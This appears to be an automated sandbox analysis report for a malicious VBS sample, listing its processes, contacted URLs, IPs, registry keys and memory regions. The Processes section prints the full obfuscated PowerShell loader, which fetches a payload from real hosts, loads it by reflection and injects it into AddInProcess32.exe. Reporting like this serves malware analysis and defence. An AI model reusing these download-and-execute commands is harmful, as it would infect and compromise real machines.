Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
qiEmGNhUij.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvgtewv4.0vn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfgj5vub.1ok.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lz031atc.djd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1xxb4jj.kzk.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+'
= (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent =
'+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type
= 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+',
[object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39)
)"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/AaTNM/0
|
188.114.96.3
|
|
|
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Content
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.96.3
|
|
|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
148.113.165.11
|
unknown
|
United States
|
|
|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
|
Version
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1DFCD980000
|
trusted library section
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
1DFC57A7000
|
trusted library allocation
|
page read and write
|
|
|
|
1DFB57B3000
|
trusted library allocation
|
page read and write
|
|
|
|
2D91000
|
trusted library allocation
|
page read and write
|
|
|
|
1D4E9C90000
|
heap
|
page read and write
|
||
|
1D4E9DA0000
|
heap
|
page read and write
|
||
|
FB0000
|
trusted library allocation
|
page read and write
|
||
|
1DFB6E48000
|
trusted library allocation
|
page read and write
|
||
|
5A3B000
|
heap
|
page read and write
|
||
|
10ED000
|
heap
|
page read and write
|
||
|
FB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1010000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DFC51A0000
|
trusted library allocation
|
page read and write
|
||
|
12AC000
|
stack
|
page read and write
|
||
|
1D4E9D53000
|
heap
|
page read and write
|
||
|
1D4EA080000
|
heap
|
page read and write
|
||
|
1DFB33CC000
|
heap
|
page read and write
|
||
|
25025A97000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A60000
|
trusted library allocation
|
page read and write
|
||
|
7FF8879F0000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBC34000
|
heap
|
page read and write
|
||
|
2E03000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A50000
|
trusted library allocation
|
page read and write
|
||
|
576E000
|
stack
|
page read and write
|
||
|
1DFB3635000
|
heap
|
page read and write
|
||
|
7FF887A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
571B000
|
trusted library allocation
|
page read and write
|
||
|
1DFB33D6000
|
heap
|
page read and write
|
||
|
28AD0FB000
|
stack
|
page read and write
|
||
|
5EEF000
|
stack
|
page read and write
|
||
|
61EE000
|
stack
|
page read and write
|
||
|
7FF887B30000
|
trusted library allocation
|
page read and write
|
||
|
71532BB000
|
stack
|
page read and write
|
||
|
715323F000
|
stack
|
page read and write
|
||
|
584E000
|
stack
|
page read and write
|
||
|
2E25000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBBCA000
|
heap
|
page read and write
|
||
|
7FF887B80000
|
trusted library allocation
|
page read and write
|
||
|
D4A81FE000
|
stack
|
page read and write
|
||
|
1D4E9D6F000
|
heap
|
page read and write
|
||
|
4E8E000
|
stack
|
page read and write
|
||
|
57F0000
|
heap
|
page read and write
|
||
|
7FF887970000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DFCD440000
|
heap
|
page read and write
|
||
|
7FF887910000
|
trusted library allocation
|
page read and write
|
||
|
7152F37000
|
stack
|
page read and write
|
||
|
1D4EBBB9000
|
heap
|
page read and write
|
||
|
7FF887BC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B70000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887B20000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBBF3000
|
heap
|
page read and write
|
||
|
5719000
|
trusted library allocation
|
page read and write
|
||
|
1DFB6AFC000
|
trusted library allocation
|
page read and write
|
||
|
7FF887860000
|
trusted library allocation
|
page read and write
|
||
|
57A0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
1D4E9D42000
|
heap
|
page read and write
|
||
|
1DFB33D0000
|
heap
|
page read and write
|
||
|
1D4E9CC0000
|
heap
|
page read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
28ACEFE000
|
stack
|
page read and write
|
||
|
25025980000
|
heap
|
page read and write
|
||
|
2DED000
|
trusted library allocation
|
page read and write
|
||
|
2DDD000
|
trusted library allocation
|
page read and write
|
||
|
56F6000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AE0000
|
trusted library allocation
|
page read and write
|
||
|
1DFB6858000
|
trusted library allocation
|
page read and write
|
||
|
1DFB4D70000
|
heap
|
page execute and read and write
|
||
|
5790000
|
heap
|
page read and write
|
||
|
56D4000
|
trusted library allocation
|
page read and write
|
||
|
52B0000
|
heap
|
page execute and read and write
|
||
|
1D4EBDD0000
|
heap
|
page read and write
|
||
|
1DFB4E40000
|
heap
|
page read and write
|
||
|
59BC000
|
heap
|
page read and write
|
||
|
1066000
|
heap
|
page read and write
|
||
|
1DFB6E43000
|
trusted library allocation
|
page read and write
|
||
|
1DFCD520000
|
heap
|
page execute and read and write
|
||
|
7FF88787B000
|
trusted library allocation
|
page read and write
|
||
|
1DFCD640000
|
heap
|
page read and write
|
||
|
7152EBE000
|
stack
|
page read and write
|
||
|
5F2E000
|
stack
|
page read and write
|
||
|
1DFB55AC000
|
trusted library allocation
|
page read and write
|
||
|
1DFB3414000
|
heap
|
page read and write
|
||
|
5E2E000
|
stack
|
page read and write
|
||
|
53BD000
|
heap
|
page read and write
|
||
|
7FF887AB0000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9CD0000
|
heap
|
page read and write
|
||
|
2503599F000
|
trusted library allocation
|
page read and write
|
||
|
1DFCD66D000
|
heap
|
page read and write
|
||
|
25025930000
|
heap
|
page execute and read and write
|
||
|
7152D7E000
|
stack
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
E20000
|
heap
|
page read and write
|
||
|
1068000
|
heap
|
page read and write
|
||
|
7FF887B30000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B40000
|
trusted library allocation
|
page read and write
|
||
|
2503DBEA000
|
heap
|
page read and write
|
||
|
25023B75000
|
heap
|
page read and write
|
||
|
126E000
|
stack
|
page read and write
|
||
|
D4A8279000
|
stack
|
page read and write
|
||
|
1D4E9D42000
|
heap
|
page read and write
|
||
|
1DFB4D10000
|
trusted library allocation
|
page read and write
|
||
|
1408000
|
trusted library allocation
|
page read and write
|
||
|
1DFB61B3000
|
trusted library allocation
|
page read and write
|
||
|
1DFC61A7000
|
trusted library allocation
|
page read and write
|
||
|
D4A7EFD000
|
stack
|
page read and write
|
||
|
7FF887B50000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
1DFB578C000
|
trusted library allocation
|
page read and write
|
||
|
7FF88786D000
|
trusted library allocation
|
page execute and read and write
|
||
|
D4A90CD000
|
stack
|
page read and write
|
||
|
7FF887B00000
|
trusted library allocation
|
page read and write
|
||
|
25035991000
|
trusted library allocation
|
page read and write
|
||
|
D4A7BFE000
|
stack
|
page read and write
|
||
|
7FF887C00000
|
trusted library allocation
|
page read and write
|
||
|
528E000
|
stack
|
page read and write
|
||
|
1D4EBBE9000
|
heap
|
page read and write
|
||
|
7152C7C000
|
stack
|
page read and write
|
||
|
7FF887863000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
1D4EBBE9000
|
heap
|
page read and write
|
||
|
715303E000
|
stack
|
page read and write
|
||
|
FC0000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBBB6000
|
heap
|
page read and write
|
||
|
2DD3000
|
trusted library allocation
|
page read and write
|
||
|
7FF887860000
|
trusted library allocation
|
page read and write
|
||
|
25025F86000
|
trusted library allocation
|
page read and write
|
||
|
7FF887920000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887A50000
|
trusted library allocation
|
page execute and read and write
|
||
|
D4A82F7000
|
stack
|
page read and write
|
||
|
D4A8378000
|
stack
|
page read and write
|
||
|
1DFB520C000
|
trusted library allocation
|
page read and write
|
||
|
FEB000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4EBBBD000
|
heap
|
page read and write
|
||
|
1D4E9D51000
|
heap
|
page read and write
|
||
|
1DFCD33A000
|
heap
|
page read and write
|
||
|
25025A8F000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9CEC000
|
heap
|
page read and write
|
||
|
1D4EBBC5000
|
heap
|
page read and write
|
||
|
7FF887A80000
|
trusted library allocation
|
page read and write
|
||
|
10F2000
|
heap
|
page read and write
|
||
|
250259DA000
|
trusted library allocation
|
page read and write
|
||
|
2503DB97000
|
heap
|
page read and write
|
||
|
520E000
|
stack
|
page read and write
|
||
|
2DF3000
|
trusted library allocation
|
page read and write
|
||
|
2E0A000
|
trusted library allocation
|
page read and write
|
||
|
1DFCD675000
|
heap
|
page read and write
|
||
|
25025D8C000
|
trusted library allocation
|
page read and write
|
||
|
7152BFE000
|
stack
|
page read and write
|
||
|
7153037000
|
stack
|
page read and write
|
||
|
25023B50000
|
heap
|
page read and write
|
||
|
2503DC30000
|
heap
|
page read and write
|
||
|
25023AF0000
|
heap
|
page read and write
|
||
|
7152B7E000
|
stack
|
page read and write
|
||
|
1D4EBBB4000
|
heap
|
page read and write
|
||
|
524E000
|
stack
|
page read and write
|
||
|
1DFB6A77000
|
trusted library allocation
|
page read and write
|
||
|
7FF887936000
|
trusted library allocation
|
page execute and read and write
|
||
|
25025927000
|
heap
|
page execute and read and write
|
||
|
7FF887853000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF88790C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887AC0000
|
trusted library allocation
|
page read and write
|
||
|
1DFCD685000
|
heap
|
page read and write
|
||
|
2E21000
|
trusted library allocation
|
page read and write
|
||
|
25025AA9000
|
trusted library allocation
|
page read and write
|
||
|
2DC8000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B10000
|
trusted library allocation
|
page read and write
|
||
|
250258B0000
|
heap
|
page execute and read and write
|
||
|
5705000
|
trusted library allocation
|
page read and write
|
||
|
5720000
|
trusted library allocation
|
page read and write
|
||
|
D4A904E000
|
stack
|
page read and write
|
||
|
2DF6000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9EA0000
|
heap
|
page read and write
|
||
|
7FF887B10000
|
trusted library allocation
|
page read and write
|
||
|
2DE3000
|
trusted library allocation
|
page read and write
|
||
|
12B0000
|
trusted library allocation
|
page read and write
|
||
|
2E1F000
|
trusted library allocation
|
page read and write
|
||
|
1DFB33EE000
|
heap
|
page read and write
|
||
|
25025EBE000
|
trusted library allocation
|
page read and write
|
||
|
7152AFF000
|
stack
|
page read and write
|
||
|
7152E79000
|
stack
|
page read and write
|
||
|
1D4EBBE9000
|
heap
|
page read and write
|
||
|
14E6000
|
heap
|
page read and write
|
||
|
606C000
|
stack
|
page read and write
|
||
|
1DFB4D50000
|
trusted library allocation
|
page read and write
|
||
|
1DFB33CE000
|
heap
|
page read and write
|
||
|
7FF887A0A000
|
trusted library allocation
|
page read and write
|
||
|
250254B0000
|
heap
|
page read and write
|
||
|
7FF887A1A000
|
trusted library allocation
|
page read and write
|
||
|
1DFB4CE0000
|
trusted library allocation
|
page read and write
|
||
|
1DFB4C60000
|
heap
|
page read and write
|
||
|
FA0000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9CF9000
|
heap
|
page read and write
|
||
|
1DFB5576000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A00000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBC06000
|
heap
|
page read and write
|
||
|
C6C000
|
stack
|
page read and write
|
||
|
D68000
|
stack
|
page read and write
|
||
|
6A8E000
|
stack
|
page read and write
|
||
|
57ED000
|
stack
|
page read and write
|
||
|
D4A84FE000
|
stack
|
page read and write
|
||
|
1DFCD2A0000
|
heap
|
page read and write
|
||
|
1DFB4DE0000
|
heap
|
page execute and read and write
|
||
|
7FF887862000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A32000
|
trusted library allocation
|
page read and write
|
||
|
1DFCD698000
|
heap
|
page read and write
|
||
|
25023BF1000
|
heap
|
page read and write
|
||
|
7FF887BE4000
|
trusted library allocation
|
page read and write
|
||
|
2DE1000
|
trusted library allocation
|
page read and write
|
||
|
55BD000
|
stack
|
page read and write
|
||
|
1DFB4CD0000
|
heap
|
page readonly
|
||
|
25023C36000
|
heap
|
page read and write
|
||
|
1DFB6BEC000
|
trusted library allocation
|
page read and write
|
||
|
2503DC10000
|
heap
|
page read and write
|
||
|
1DFB3370000
|
heap
|
page read and write
|
||
|
7FF887AA0000
|
trusted library allocation
|
page read and write
|
||
|
2503DBD6000
|
heap
|
page read and write
|
||
|
1D4E9CBD000
|
heap
|
page read and write
|
||
|
25025AED000
|
trusted library allocation
|
page read and write
|
||
|
602E000
|
stack
|
page read and write
|
||
|
1D4E9D57000
|
heap
|
page read and write
|
||
|
FDA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7152DFE000
|
stack
|
page read and write
|
||
|
25023C9E000
|
heap
|
page read and write
|
||
|
25025460000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A90000
|
trusted library allocation
|
page read and write
|
||
|
10E3000
|
heap
|
page read and write
|
||
|
1D4EBBB1000
|
heap
|
page read and write
|
||
|
1D4EBBB9000
|
heap
|
page read and write
|
||
|
1DFB4E45000
|
heap
|
page read and write
|
||
|
7FF887A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
715313E000
|
stack
|
page read and write
|
||
|
1000000
|
trusted library allocation
|
page read and write
|
||
|
25023BEF000
|
heap
|
page read and write
|
||
|
D4A817E000
|
stack
|
page read and write
|
||
|
7FF887916000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
54BE000
|
stack
|
page read and write
|
||
|
1102000
|
heap
|
page read and write
|
||
|
1DFCD190000
|
heap
|
page read and write
|
||
|
1DFB4D76000
|
heap
|
page execute and read and write
|
||
|
D4A7E73000
|
stack
|
page read and write
|
||
|
28AC6FA000
|
stack
|
page read and write
|
||
|
7FF887864000
|
trusted library allocation
|
page read and write
|
||
|
1DFB5581000
|
trusted library allocation
|
page read and write
|
||
|
1030000
|
heap
|
page read and write
|
||
|
25025AA2000
|
trusted library allocation
|
page read and write
|
||
|
FBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3D91000
|
trusted library allocation
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
7FF8879F2000
|
trusted library allocation
|
page read and write
|
||
|
25025AE8000
|
trusted library allocation
|
page read and write
|
||
|
1DFB53B2000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B20000
|
trusted library allocation
|
page read and write
|
||
|
1DFB5585000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9D42000
|
heap
|
page read and write
|
||
|
622C000
|
stack
|
page read and write
|
||
|
D4A847E000
|
stack
|
page read and write
|
||
|
12E7000
|
trusted library allocation
|
page read and write
|
||
|
28AC7FE000
|
stack
|
page read and write
|
||
|
56E4000
|
trusted library allocation
|
page read and write
|
||
|
1DFC5191000
|
trusted library allocation
|
page read and write
|
||
|
13FE000
|
stack
|
page read and write
|
||
|
2DCF000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A42000
|
trusted library allocation
|
page read and write
|
||
|
1DFB4D12000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9D15000
|
heap
|
page read and write
|
||
|
2503E050000
|
heap
|
page read and write
|
||
|
7FF887B50000
|
trusted library allocation
|
page read and write
|
||
|
28ACDFD000
|
stack
|
page read and write
|
||
|
1DFB3350000
|
heap
|
page read and write
|
||
|
1123000
|
heap
|
page read and write
|
||
|
2D8F000
|
stack
|
page read and write
|
||
|
1DFB4CC0000
|
trusted library allocation
|
page read and write
|
||
|
D4A867B000
|
stack
|
page read and write
|
||
|
53B5000
|
heap
|
page read and write
|
||
|
7FF887AD0000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBBE6000
|
heap
|
page read and write
|
||
|
7FF887BA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887900000
|
trusted library allocation
|
page read and write
|
||
|
1038000
|
heap
|
page read and write
|
||
|
7FF887A01000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B00000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9CF9000
|
heap
|
page read and write
|
||
|
7FF887B60000
|
trusted library allocation
|
page read and write
|
||
|
25025E56000
|
trusted library allocation
|
page read and write
|
||
|
7FF887BF3000
|
trusted library allocation
|
page read and write
|
||
|
7152A7D000
|
stack
|
page read and write
|
||
|
3D97000
|
trusted library allocation
|
page read and write
|
||
|
25023C84000
|
heap
|
page read and write
|
||
|
7FF887A70000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBC05000
|
heap
|
page read and write
|
||
|
28AC8FE000
|
stack
|
page read and write
|
||
|
40E000
|
remote allocation
|
page execute and read and write
|
||
|
2E27000
|
trusted library allocation
|
page read and write
|
||
|
7FF887946000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DF1000
|
trusted library allocation
|
page read and write
|
||
|
25023B70000
|
heap
|
page read and write
|
||
|
6BCC000
|
stack
|
page read and write
|
||
|
2DDB000
|
trusted library allocation
|
page read and write
|
||
|
7FF88791C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF88785D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4E9D54000
|
heap
|
page read and write
|
||
|
5398000
|
heap
|
page read and write
|
||
|
594F000
|
stack
|
page read and write
|
||
|
7FF887870000
|
trusted library allocation
|
page read and write
|
||
|
25023C1B000
|
heap
|
page read and write
|
||
|
25023A10000
|
heap
|
page read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
12F7000
|
heap
|
page read and write
|
||
|
25025A8C000
|
trusted library allocation
|
page read and write
|
||
|
25023BC3000
|
heap
|
page read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
FE2000
|
trusted library allocation
|
page read and write
|
||
|
5302000
|
heap
|
page read and write
|
||
|
5710000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B40000
|
trusted library allocation
|
page read and write
|
||
|
1DFB686A000
|
trusted library allocation
|
page read and write
|
||
|
2503DB90000
|
heap
|
page read and write
|
||
|
7FF887852000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B90000
|
trusted library allocation
|
page read and write
|
||
|
FE7000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DFB4DF0000
|
heap
|
page read and write
|
||
|
53B1000
|
heap
|
page read and write
|
||
|
250259F2000
|
trusted library allocation
|
page read and write
|
||
|
1D4EBBCD000
|
heap
|
page read and write
|
||
|
2DDF000
|
trusted library allocation
|
page read and write
|
||
|
25023BB0000
|
heap
|
page read and write
|
||
|
250259AB000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A80000
|
trusted library allocation
|
page read and write
|
||
|
1DFB556C000
|
trusted library allocation
|
page read and write
|
||
|
FD6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4EBC04000
|
heap
|
page read and write
|
||
|
25025991000
|
trusted library allocation
|
page read and write
|
||
|
2DF8000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A90000
|
trusted library allocation
|
page read and write
|
||
|
25025A19000
|
trusted library allocation
|
page read and write
|
||
|
2503DBE6000
|
heap
|
page read and write
|
||
|
2503DC0E000
|
heap
|
page read and write
|
||
|
7FF887AF0000
|
trusted library allocation
|
page read and write
|
||
|
D4A807D000
|
stack
|
page read and write
|
||
|
25025470000
|
heap
|
page readonly
|
||
|
1DFB33D4000
|
heap
|
page read and write
|
||
|
5A2D000
|
heap
|
page read and write
|
||
|
7DF48A910000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DFB6866000
|
trusted library allocation
|
page read and write
|
||
|
1D4E9E80000
|
heap
|
page read and write
|
||
|
D4A85FF000
|
stack
|
page read and write
|
||
|
1D4EBBD9000
|
heap
|
page read and write
|
||
|
1020000
|
heap
|
